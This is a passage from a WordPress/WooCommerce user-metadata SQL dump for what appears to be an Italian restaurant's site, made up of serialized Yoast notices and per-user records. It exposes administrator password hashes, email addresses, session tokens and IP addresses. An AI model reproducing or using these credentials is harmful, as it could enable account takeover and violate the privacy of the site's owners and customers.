pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:26:\"wpcf_custom_post_type_view\";b:1;s:26:\"wpcf_custom_post_type_edit\";b:1;s:33:\"wpcf_custom_post_type_edit_others\";b:1;s:25:\"wpcf_custom_taxonomy_view\";b:1;s:25:\"wpcf_custom_taxonomy_edit\";b:1;s:32:\"wpcf_custom_taxonomy_edit_others\";b:1;s:22:\"wpcf_custom_field_view\";b:1;s:22:\"wpcf_custom_field_edit\";b:1;s:29:\"wpcf_custom_field_edit_others\";b:1;s:25:\"wpcf_user_meta_field_view\";b:1;s:25:\"wpcf_user_meta_field_edit\";b:1;s:32:\"wpcf_user_meta_field_edit_others\";b:1;s:18:\"manage_woocommerce\";b:1;s:24:\"view_woocommerce_reports\";b:1;s:12:\"edit_product\";b:1;s:12:\"read_product\";b:1;s:14:\"delete_product\";b:1;s:13:\"edit_products\";b:1;s:20:\"edit_others_products\";b:1;s:16:\"publish_products\";b:1;s:21:\"read_private_products\";b:1;s:15:\"delete_products\";b:1;s:23:\"delete_private_products\";b:1;s:25:\"delete_published_products\";b:1;s:22:\"delete_others_products\";b:1;s:21:\"edit_private_products\";b:1;s:23:\"edit_published_products\";b:1;s:20:\"manage_product_terms\";b:1;s:18:\"edit_product_terms\";b:1;s:20:\"delete_product_terms\";b:1;s:20:\"assign_product_terms\";b:1;s:15:\"edit_shop_order\";b:1;s:15:\"read_shop_order\";b:1;s:17:\"delete_shop_order\";b:1;s:16:\"edit_shop_orders\";b:1;s:23:\"edit_others_shop_orders\";b:1;s:19:\"publish_shop_orders\";b:1;s:24:\"read_private_shop_orders\";b:1;s:18:\"delete_shop_orders\";b:1;s:26:\"delete_private_shop_orders\";b:1;s:28:\"delete_published_shop_orders\";b:1;s:25:\"delete_others_shop_orders\";b:1;s:24:\"edit_private_shop_orders\";b:1;s:26:\"edit_published_shop_orders\";b:1;s:23:\"manage_shop_order_terms\";b:1;s:21:\"edit_shop_order_terms\";b:1;s:23:\"delete_shop_order_terms\";b:1;s:23:\"assign_shop_order_terms\";b:1;s:16:\"edit_shop_coupon\";b:1;s:16:\"read_shop_coupon\";b:1;s:18:\"delete_shop_coupon\";b:1;s:17:\"edit_shop_coupons\";b:1;s:24:\"edit_others_shop_coupons\";b:1;s:20:\"publish_shop_coupons\";b:1;s:25:\"read_private_shop_coupons\";b:1;s:19:\"delete_shop_coupons\";b:1;s:27:\"delete_private_shop_coupons\";b:1;s:29:\"delete_published_shop_coupons\";b:1;s:26:\"delete_others_shop_coupons\";b:1;s:25:\"edit_private_shop_coupons\";b:1;s:27:\"edit_published_shop_coupons\";b:1;s:24:\"manage_shop_coupon_terms\";b:1;s:22:\"edit_shop_coupon_terms\";b:1;s:24:\"delete_shop_coupon_terms\";b:1;s:24:\"assign_shop_coupon_terms\";b:1;s:17:\"edit_shop_webhook\";b:1;s:17:\"read_shop_webhook\";b:1;s:19:\"delete_shop_webhook\";b:1;s:18:\"edit_shop_webhooks\";b:1;s:25:\"edit_others_shop_webhooks\";b:1;s:21:\"publish_shop_webhooks\";b:1;s:26:\"read_private_shop_webhooks\";b:1;s:20:\"delete_shop_webhooks\";b:1;s:28:\"delete_private_shop_webhooks\";b:1;s:30:\"delete_published_shop_webhooks\";b:1;s:27:\"delete_others_shop_webhooks\";b:1;s:26:\"edit_private_shop_webhooks\";b:1;s:28:\"edit_published_shop_webhooks\";b:1;s:25:\"manage_shop_webhook_terms\";b:1;s:23:\"edit_shop_webhook_terms\";b:1;s:25:\"delete_shop_webhook_terms\";b:1;s:25:\"assign_shop_webhook_terms\";b:1;s:20:\"wpseo_manage_options\";b:1;s:29:\"manage_instagram_feed_options\";b:1;s:9:\"read_post\";b:1;s:24:\"read_private_sgpb_popups\";b:1;s:15:\"edit_sgpb_popup\";b:1;s:16:\"edit_sgpb_popups\";b:1;s:23:\"edit_others_sgpb_popups\";b:1;s:26:\"edit_published_sgpb_popups\";b:1;s:19:\"publish_sgpb_popups\";b:1;s:18:\"delete_sgpb_popups\";b:1;s:25:\"delete_others_sgpb_popups\";b:1;s:26:\"delete_private_sgpb_popups\";b:1;s:25:\"delete_private_sgpb_popup\";b:1;s:28:\"delete_published_sgpb_popups\";b:1;s:19:\"sgpb_manage_options\";b:1;s:18:\"manage_popup_terms\";b:1;s:29:\"manage_popup_categories_terms\";b:1;s:21:\"mailjet_plugin_access\";b:1;s:13:\"administrator\";b:1;}s:6:\"filter\";N;s:16:\"\0WP_User\0site_id\";i:1;}s:5:\"nonce\";N;s:8:\"priority\";d:0.5;s:9:\"data_json\";a:1:{s:13:\"dismiss_value\";s:6:\"15.1.1\";}s:13:\"dismissal_key\";s:20:\"wpseo-plugin-updated\";s:12:\"capabilities\";a:1:{i:0;s:20:\"wpseo_manage_options\";}s:16:\"capability_check\";s:3:\"all\";s:14:\"yoast_branding\";b:0;}}i:1;a:2:{s:7:\"message\";s:432:\"Yoast SEO and WooCommerce can work together a lot better by adding a helper plugin. Please install Yoast WooCommerce SEO to make your life better. <a href=\"https://yoa.st/1o0?php_version=7.3&platform=wordpress&platform_version=5.5.1&software=free&software_version=15.1.1&days_active=30plus&user_language=en_US\" aria-label=\"More information about Yoast WooCommerce SEO\" target=\"_blank\" rel=\"noopener noreferrer\">More information</a>.\";s:7:\"options\";a:10:{s:4:\"type\";s:7:\"warning\";s:2:\"id\";s:44:\"wpseo-suggested-plugin-yoast-woocommerce-seo\";s:4:\"user\";r:7;s:5:\"nonce\";N;s:8:\"priority\";d:0.5;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";a:1:{i:0;s:15:\"install_plugins\";}s:16:\"capability_check\";s:3:\"all\";s:14:\"yoast_branding\";b:0;}}i:2;a:2:{s:7:\"message\";O:61:\"Yoast\\WP\\SEO\\Presenters\\Admin\\Indexing_Notification_Presenter\":3:{s:18:\"\0*\0total_unindexed\";i:106;s:9:\"\0*\0reason\";s:26:\"permalink_settings_changed\";s:20:\"\0*\0short_link_helper\";O:38:\"Yoast\\WP\\SEO\\Helpers\\Short_Link_Helper\":2:{s:17:\"\0*\0options_helper\";O:35:\"Yoast\\WP\\SEO\\Helpers\\Options_Helper\":0:{}s:17:\"\0*\0product_helper\";O:35:\"Yoast\\WP\\SEO\\Helpers\\Product_Helper\":0:{}}}s:7:\"options\";a:10:{s:4:\"type\";s:7:\"warning\";s:2:\"id\";s:13:\"wpseo-reindex\";s:4:\"user\";O:7:\"WP_User\":8:{s:4:\"data\";O:8:\"stdClass\":10:{s:2:\"ID\";s:2:\"63\";s:10:\"user_login\";s:10:\"kvchosting\";s:9:\"user_pass\";s:34:\"$P$BiOEU/G8yXeThP08NUXjZBHi/9iYQO1\";s:13:\"user_nicename\";s:10:\"kvchosting\";s:10:\"user_email\";s:31:\"kvchosting@ristorantesolymar.it\";s:8:\"user_url\";s:0:\"\";s:15:\"user_registered\";s:19:\"2020-06-08 16:39:13\";s:19:\"user_activation_key\";s:0:\"\";s:11:\"user_status\";s:1:\"0\";s:12:\"display_name\";s:10:\"kvchosting\";}s:2:\"ID\";i:63;s:4:\"caps\";a:1:{s:13:\"administrator\";b:1;}s:7:\"cap_key\";s:15:\"wp_capabilities\";s:5:\"roles\";a:1:{i:0;s:13:\"administrator\";}s:7:\"allcaps\";a:162:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:26:\"wpcf_custom_post_type_view\";b:1;s:26:\"wpcf_custom_post_type_edit\";b:1;s:33:\"wpcf_custom_post_type_edit_others\";b:1;s:25:\"wpcf_custom_taxonomy_view\";b:1;s:25:\"wpcf_custom_taxonomy_edit\";b:1;s:32:\"wpcf_custom_taxonomy_edit_others\";b:1;s:22:\"wpcf_custom_field_view\";b:1;s:22:\"wpcf_custom_field_edit\";b:1;s:29:\"wpcf_custom_field_edit_others\";b:1;s:25:\"wpcf_user_meta_field_view\";b:1;s:25:\"wpcf_user_meta_field_edit\";b:1;s:32:\"wpcf_user_meta_field_edit_others\";b:1;s:18:\"manage_woocommerce\";b:1;s:24:\"view_woocommerce_reports\";b:1;s:12:\"edit_product\";b:1;s:12:\"read_product\";b:1;s:14:\"delete_product\";b:1;s:13:\"edit_products\";b:1;s:20:\"edit_others_products\";b:1;s:16:\"publish_products\";b:1;s:21:\"read_private_products\";b:1;s:15:\"delete_products\";b:1;s:23:\"delete_private_products\";b:1;s:25:\"delete_published_products\";b:1;s:22:\"delete_others_products\";b:1;s:21:\"edit_private_products\";b:1;s:23:\"edit_published_products\";b:1;s:20:\"manage_product_terms\";b:1;s:18:\"edit_product_terms\";b:1;s:20:\"delete_product_terms\";b:1;s:20:\"assign_product_terms\";b:1;s:15:\"edit_shop_order\";b:1;s:15:\"read_shop_order\";b:1;s:17:\"delete_shop_order\";b:1;s:16:\"edit_shop_orders\";b:1;s:23:\"edit_others_shop_orders\";b:1;s:19:\"publish_shop_orders\";b:1;s:24:\"read_private_shop_orders\";b:1;s:18:\"delete_shop_orders\";b:1;s:26:\"delete_private_shop_orders\";b:1;s:28:\"delete_published_shop_orders\";b:1;s:25:\"delete_others_shop_orders\";b:1;s:24:\"edit_private_shop_orders\";b:1;s:26:\"edit_published_shop_orders\";b:1;s:23:\"manage_shop_order_terms\";b:1;s:21:\"edit_shop_order_terms\";b:1;s:23:\"delete_shop_order_terms\";b:1;s:23:\"assign_shop_order_terms\";b:1;s:16:\"edit_shop_coupon\";b:1;s:16:\"read_shop_coupon\";b:1;s:18:\"delete_shop_coupon\";b:1;s:17:\"edit_shop_coupons\";b:1;s:24:\"edit_others_shop_coupons\";b:1;s:20:\"publish_shop_coupons\";b:1;s:25:\"read_private_shop_coupons\";b:1;s:19:\"delete_shop_coupons\";b:1;s:27:\"delete_private_shop_coupons\";b:1;s:29:\"delete_published_shop_coupons\";b:1;s:26:\"delete_others_shop_coupons\";b:1;s:25:\"edit_private_shop_coupons\";b:1;s:27:\"edit_published_shop_coupons\";b:1;s:24:\"manage_shop_coupon_terms\";b:1;s:22:\"edit_shop_coupon_terms\";b:1;s:24:\"delete_shop_coupon_terms\";b:1;s:24:\"assign_shop_coupon_terms\";b:1;s:17:\"edit_shop_webhook\";b:1;s:17:\"read_shop_webhook\";b:1;s:19:\"delete_shop_webhook\";b:1;s:18:\"edit_shop_webhooks\";b:1;s:25:\"edit_others_shop_webhooks\";b:1;s:21:\"publish_shop_webhooks\";b:1;s:26:\"read_private_shop_webhooks\";b:1;s:20:\"delete_shop_webhooks\";b:1;s:28:\"delete_private_shop_webhooks\";b:1;s:30:\"delete_published_shop_webhooks\";b:1;s:27:\"delete_others_shop_webhooks\";b:1;s:26:\"edit_private_shop_webhooks\";b:1;s:28:\"edit_published_shop_webhooks\";b:1;s:25:\"manage_shop_webhook_terms\";b:1;s:23:\"edit_shop_webhook_terms\";b:1;s:25:\"delete_shop_webhook_terms\";b:1;s:25:\"assign_shop_webhook_terms\";b:1;s:20:\"wpseo_manage_options\";b:1;s:29:\"manage_instagram_feed_options\";b:1;s:9:\"read_post\";b:1;s:24:\"read_private_sgpb_popups\";b:1;s:15:\"edit_sgpb_popup\";b:1;s:16:\"edit_sgpb_popups\";b:1;s:23:\"edit_others_sgpb_popups\";b:1;s:26:\"edit_published_sgpb_popups\";b:1;s:19:\"publish_sgpb_popups\";b:1;s:18:\"delete_sgpb_popups\";b:1;s:25:\"delete_others_sgpb_popups\";b:1;s:26:\"delete_private_sgpb_popups\";b:1;s:25:\"delete_private_sgpb_popup\";b:1;s:28:\"delete_published_sgpb_popups\";b:1;s:19:\"sgpb_manage_options\";b:1;s:18:\"manage_popup_terms\";b:1;s:29:\"manage_popup_categories_terms\";b:1;s:21:\"mailjet_plugin_access\";b:1;s:13:\"administrator\";b:1;}s:6:\"filter\";N;s:16:\"\0WP_User\0site_id\";i:1;}s:5:\"nonce\";N;s:8:\"priority\";d:0.8000000000000000444089209850062616169452667236328125;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";s:20:\"wpseo_manage_options\";s:16:\"capability_check\";s:3:\"all\";s:14:\"yoast_branding\";b:0;}}}'),(1760,63,'qlwcdc-user-rating','1'),(1766,62,'wc_last_active','1591747200'),(1768,62,'_woocommerce_tracks_anon_id','woo:BGCvidH8C97ZwtQZJ74Km1Vv'),(1769,62,'wp_dashboard_quick_press_last_post_id','979'),(1770,62,'wp_yoast_notifications','a:1:{i:0;a:2:{s:7:\"message\";s:455:\"Yoast SEO e WooCommerce possono lavorare insieme molto meglio con l\'aggiunta di un plugin helper. Installa Yoast WooCommerce SEO per rendere la tua vita migliore. <a href=\"https://yoa.st/1o0?php_version=7.0&platform=wordpress&platform_version=5.4.1&software=free&software_version=14.2&days_active=30plus&user_language=it_IT\" aria-label=\"Ulteriori informazioni su Yoast WooCommerce SEO\" target=\"_blank\" rel=\"noopener noreferrer\">Ulteriori informazioni</a>.\";s:7:\"options\";a:10:{s:4:\"type\";s:7:\"warning\";s:2:\"id\";s:44:\"wpseo-suggested-plugin-yoast-woocommerce-seo\";s:4:\"user\";O:7:\"WP_User\":8:{s:4:\"data\";O:8:\"stdClass\":10:{s:2:\"ID\";s:2:\"62\";s:10:\"user_login\";s:7:\"mailjet\";s:9:\"user_pass\";s:34:\"$P$BuUYe3gkH8bCrrgBNUQxpMDKTuCubF1\";s:13:\"user_nicename\";s:7:\"mailjet\";s:10:\"user_email\";s:27:\"franco@ristorantesolymar.it\";s:8:\"user_url\";s:0:\"\";s:15:\"user_registered\";s:19:\"2020-06-08 16:30:46\";s:19:\"user_activation_key\";s:0:\"\";s:11:\"user_status\";s:1:\"0\";s:12:\"display_name\";s:7:\"mailjet\";}s:2:\"ID\";i:62;s:4:\"caps\";a:1:{s:13:\"administrator\";b:1;}s:7:\"cap_key\";s:15:\"wp_capabilities\";s:5:\"roles\";a:1:{i:0;s:13:\"administrator\";}s:7:\"allcaps\";a:164:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:26:\"wpcf_custom_post_type_view\";b:1;s:26:\"wpcf_custom_post_type_edit\";b:1;s:33:\"wpcf_custom_post_type_edit_others\";b:1;s:25:\"wpcf_custom_taxonomy_view\";b:1;s:25:\"wpcf_custom_taxonomy_edit\";b:1;s:32:\"wpcf_custom_taxonomy_edit_others\";b:1;s:22:\"wpcf_custom_field_view\";b:1;s:22:\"wpcf_custom_field_edit\";b:1;s:29:\"wpcf_custom_field_edit_others\";b:1;s:25:\"wpcf_user_meta_field_view\";b:1;s:25:\"wpcf_user_meta_field_edit\";b:1;s:32:\"wpcf_user_meta_field_edit_others\";b:1;s:18:\"manage_woocommerce\";b:1;s:24:\"view_woocommerce_reports\";b:1;s:12:\"edit_product\";b:1;s:12:\"read_product\";b:1;s:14:\"delete_product\";b:1;s:13:\"edit_products\";b:1;s:20:\"edit_others_products\";b:1;s:16:\"publish_products\";b:1;s:21:\"read_private_products\";b:1;s:15:\"delete_products\";b:1;s:23:\"delete_private_products\";b:1;s:25:\"delete_published_products\";b:1;s:22:\"delete_others_products\";b:1;s:21:\"edit_private_products\";b:1;s:23:\"edit_published_products\";b:1;s:20:\"manage_product_terms\";b:1;s:18:\"edit_product_terms\";b:1;s:20:\"delete_product_terms\";b:1;s:20:\"assign_product_terms\";b:1;s:15:\"edit_shop_order\";b:1;s:15:\"read_shop_order\";b:1;s:17:\"delete_shop_order\";b:1;s:16:\"edit_shop_orders\";b:1;s:23:\"edit_others_shop_orders\";b:1;s:19:\"publish_shop_orders\";b:1;s:24:\"read_private_shop_orders\";b:1;s:18:\"delete_shop_orders\";b:1;s:26:\"delete_private_shop_orders\";b:1;s:28:\"delete_published_shop_orders\";b:1;s:25:\"delete_others_shop_orders\";b:1;s:24:\"edit_private_shop_orders\";b:1;s:26:\"edit_published_shop_orders\";b:1;s:23:\"manage_shop_order_terms\";b:1;s:21:\"edit_shop_order_terms\";b:1;s:23:\"delete_shop_order_terms\";b:1;s:23:\"assign_shop_order_terms\";b:1;s:16:\"edit_shop_coupon\";b:1;s:16:\"read_shop_coupon\";b:1;s:18:\"delete_shop_coupon\";b:1;s:17:\"edit_shop_coupons\";b:1;s:24:\"edit_others_shop_coupons\";b:1;s:20:\"publish_shop_coupons\";b:1;s:25:\"read_private_shop_coupons\";b:1;s:19:\"delete_shop_coupons\";b:1;s:27:\"delete_private_shop_coupons\";b:1;s:29:\"delete_published_shop_coupons\";b:1;s:26:\"delete_others_shop_coupons\";b:1;s:25:\"edit_private_shop_coupons\";b:1;s:27:\"edit_published_shop_coupons\";b:1;s:24:\"manage_shop_coupon_terms\";b:1;s:22:\"edit_shop_coupon_terms\";b:1;s:24:\"delete_shop_coupon_terms\";b:1;s:24:\"assign_shop_coupon_terms\";b:1;s:17:\"edit_shop_webhook\";b:1;s:17:\"read_shop_webhook\";b:1;s:19:\"delete_shop_webhook\";b:1;s:18:\"edit_shop_webhooks\";b:1;s:25:\"edit_others_shop_webhooks\";b:1;s:21:\"publish_shop_webhooks\";b:1;s:26:\"read_private_shop_webhooks\";b:1;s:20:\"delete_shop_webhooks\";b:1;s:28:\"delete_private_shop_webhooks\";b:1;s:30:\"delete_published_shop_webhooks\";b:1;s:27:\"delete_others_shop_webhooks\";b:1;s:26:\"edit_private_shop_webhooks\";b:1;s:28:\"edit_published_shop_webhooks\";b:1;s:25:\"manage_shop_webhook_terms\";b:1;s:23:\"edit_shop_webhook_terms\";b:1;s:25:\"delete_shop_webhook_terms\";b:1;s:25:\"assign_shop_webhook_terms\";b:1;s:20:\"wpseo_manage_options\";b:1;s:29:\"manage_instagram_feed_options\";b:1;s:9:\"read_post\";b:1;s:24:\"read_private_sgpb_popups\";b:1;s:15:\"edit_sgpb_popup\";b:1;s:16:\"edit_sgpb_popups\";b:1;s:23:\"edit_others_sgpb_popups\";b:1;s:26:\"edit_published_sgpb_popups\";b:1;s:19:\"publish_sgpb_popups\";b:1;s:18:\"delete_sgpb_popups\";b:1;s:25:\"delete_others_sgpb_popups\";b:1;s:26:\"delete_private_sgpb_popups\";b:1;s:25:\"delete_private_sgpb_popup\";b:1;s:28:\"delete_published_sgpb_popups\";b:1;s:19:\"sgpb_manage_options\";b:1;s:18:\"manage_popup_terms\";b:1;s:29:\"manage_popup_categories_terms\";b:1;s:21:\"mailjet_plugin_access\";b:1;s:19:\"manage_postman_smtp\";b:1;s:19:\"manage_postman_logs\";b:1;s:13:\"administrator\";b:1;}s:6:\"filter\";N;s:16:\"\0WP_User\0site_id\";i:1;}s:5:\"nonce\";N;s:8:\"priority\";d:0.5;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";a:1:{i:0;s:15:\"install_plugins\";}s:16:\"capability_check\";s:3:\"all\";s:14:\"yoast_branding\";b:0;}}}'),(1771,62,'community-events-location','a:1:{s:2:\"ip\";s:13:\"213.145.103.0\";}'),(1787,2,'meta-box-order_page','a:3:{s:4:\"side\";s:36:\"postimagediv,pageparentdiv,submitdiv\";s:6:\"normal\";s:81:\"wpseo_meta,revisionsdiv,postcustom,commentstatusdiv,commentsdiv,slugdiv,authordiv\";s:8:\"advanced\";s:0:\"\";}'),(1788,2,'screen_layout_page','2'),(1796,1,'_order_count','2'),(1802,63,'_order_count','0'),(1803,63,'wpseo_title',''),(1804,63,'wpseo_metadesc',''),(1805,63,'wpseo_noindex_author',''),(1806,63,'wpseo_content_analysis_disable',''),(1807,63,'wpseo_keyword_analysis_disable',''),(1808,63,'billing_first_name',''),(1809,63,'billing_last_name',''),(1810,63,'billing_company',''),(1811,63,'billing_address_1',''),(1812,63,'billing_address_2',''),(1813,63,'billing_city',''),(1814,63,'billing_postcode',''),(1815,63,'billing_country',''),(1816,63,'billing_state',''),(1817,63,'billing_phone',''),(1818,63,'billing_email','kvchosting@ristorantesolymar.it'),(1819,63,'shipping_first_name',''),(1820,63,'shipping_last_name',''),(1821,63,'shipping_company',''),(1822,63,'shipping_address_1',''),(1823,63,'shipping_address_2',''),(1824,63,'shipping_city',''),(1825,63,'shipping_postcode',''),(1826,63,'shipping_country',''),(1827,63,'shipping_state',''),(1828,63,'facebook',''),(1829,63,'instagram',''),(1830,63,'linkedin',''),(1831,63,'myspace',''),(1832,63,'pinterest',''),(1833,63,'soundcloud',''),(1834,63,'tumblr',''),(1835,63,'twitter',''),(1836,63,'youtube',''),(1837,63,'wikipedia',''),(1838,63,'last_update','1603699218'),(1840,63,'giftware_notice_dismissed','true'),(1841,63,'sbi_ignore_new_user_sale_notice','always'),(1842,63,'sbi_ignore_bfcm_sale_notice','2020'),(1851,64,'nickname','jdydpehffrf'),(1852,64,'first_name',''),(1853,64,'last_name',''),(1854,64,'description',''),(1855,64,'rich_editing','true'),(1856,64,'syntax_highlighting','true'),(1857,64,'comment_shortcuts','false'),(1858,64,'admin_color','fresh'),(1859,64,'use_ssl','0'),(1860,64,'show_admin_bar_front','false'),(1861,64,'locale',''),(1862,64,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1863,64,'wp_user_level','0'),(1864,64,'_yoast_wpseo_profile_updated','1609429466'),(1865,64,'session_tokens','a:1:{s:64:\"7491f1d6844e962b23f234d8f76feb94d8ae1134d56277911333d4392a97d568\";a:4:{s:10:\"expiration\";i:1610639068;s:2:\"ip\";s:15:\"207.180.224.191\";s:2:\"ua\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0\";s:5:\"login\";i:1609429468;}}'),(1866,64,'wc_last_active','1609372800'),(1867,64,'facebook',''),(1868,64,'instagram',''),(1869,64,'linkedin',''),(1870,64,'myspace',''),(1871,64,'pinterest',''),(1872,64,'soundcloud',''),(1873,64,'tumblr',''),(1874,64,'twitter',''),(1875,64,'youtube',''),(1876,64,'wikipedia',''),(1877,64,'last_update','1609429488'),(1878,65,'nickname','lupswrgooxz'),(1879,65,'first_name',''),(1880,65,'last_name',''),(1881,65,'description',''),(1882,65,'rich_editing','true'),(1883,65,'syntax_highlighting','true'),(1884,65,'comment_shortcuts','false'),(1885,65,'admin_color','fresh'),(1886,65,'use_ssl','0'),(1887,65,'show_admin_bar_front','false'),(1888,65,'locale',''),(1889,65,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1890,65,'wp_user_level','0'),(1891,65,'_yoast_wpseo_profile_updated','1609501544'),(1892,65,'session_tokens','a:1:{s:64:\"614baadd0a313388e191f7f93ee66311c8a4de1b539c7788741bf15c65649e7c\";a:4:{s:10:\"expiration\";i:1610711146;s:2:\"ip\";s:13:\"185.216.26.24\";s:2:\"ua\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0\";s:5:\"login\";i:1609501546;}}'),(1893,65,'wc_last_active','1609459200'),(1894,65,'facebook',''),(1895,65,'instagram',''),(1896,65,'linkedin',''),(1897,65,'myspace',''),(1898,65,'pinterest',''),(1899,65,'soundcloud',''),(1900,65,'tumblr',''),(1901,65,'twitter',''),(1902,65,'youtube',''),(1903,65,'wikipedia',''),(1904,65,'last_update','1609501558'),(1905,66,'nickname','stanszoqcjq'),(1906,66,'first_name',''),(1907,66,'last_name',''),(1908,66,'description',''),(1909,66,'rich_editing','true'),(1910,66,'syntax_highlighting','true'),(1911,66,'comment_shortcuts','false'),(1912,66,'admin_color','fresh'),(1913,66,'use_ssl','0'),(1914,66,'show_admin_bar_front','false'),(1915,66,'locale',''),(1916,66,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1917,66,'wp_user_level','0'),(1918,66,'_yoast_wpseo_profile_updated','1609977566'),(1919,66,'session_tokens','a:1:{s:64:\"0c9d67af0f3808b1913b168cc1f2537b4dad29286831906ada1c7c97fd1bf385\";a:4:{s:10:\"expiration\";i:1611187168;s:2:\"ip\";s:12:\"142.93.224.5\";s:2:\"ua\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0\";s:5:\"login\";i:1609977568;}}'),(1920,66,'wc_last_active','1609891200'),(1921,66,'facebook',''),(1922,66,'instagram',''),(1923,66,'linkedin',''),(1924,66,'myspace',''),(1925,66,'pinterest',''),(1926,66,'soundcloud',''),(1927,66,'tumblr',''),(1928,66,'twitter',''),(1929,66,'youtube',''),(1930,66,'wikipedia',''),(1931,66,'last_update','1609977579'),(1932,67,'nickname','jilzwxkumqq'),(1933,67,'first_name',''),(1934,67,'last_name',''),(1935,67,'description',''),(1936,67,'rich_editing','true'),(1937,67,'syntax_highlighting','true'),(1938,67,'comment_shortcuts','false'),(1939,67,'admin_color','fresh'),(1940,67,'use_ssl','0'),(1941,67,'show_admin_bar_front','false'),(1942,67,'locale',''),(1943,67,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1944,67,'wp_user_level','0'),(1945,67,'_yoast_wpseo_profile_updated','1610018826'